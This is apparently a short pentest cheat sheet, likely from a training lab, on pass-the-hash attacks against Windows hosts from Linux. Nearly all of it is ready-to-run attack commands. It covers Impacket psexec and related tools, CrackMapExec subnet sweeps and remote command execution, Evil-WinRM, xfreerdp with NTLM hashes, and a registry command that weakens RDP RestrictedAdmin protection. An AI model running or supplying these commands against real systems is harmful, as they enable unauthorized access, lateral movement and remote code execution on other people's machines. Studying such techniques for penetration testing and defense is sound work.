Using Linux

Using Impacket

• impacket-wmiexec

• impacket-atexec

• impacket-smbexec

• impacket-psexec

$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Using CrackMapExec

• use --local-auth if you want to authenticate to a local admin

# crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

# crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

Using Evil-WinRM

• use if smb is blocked or there if we don't have administrative rights

• when using a domain account, include the domain name such as administrator@inlanefreight.htb

$ evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

Using RDP

• restricted admin mode should be enabled, if not, there will be an error

• to enable restricted admin mode, use this command to add a registry key

c:\tools> reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Pass the hash using RDP

$ xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B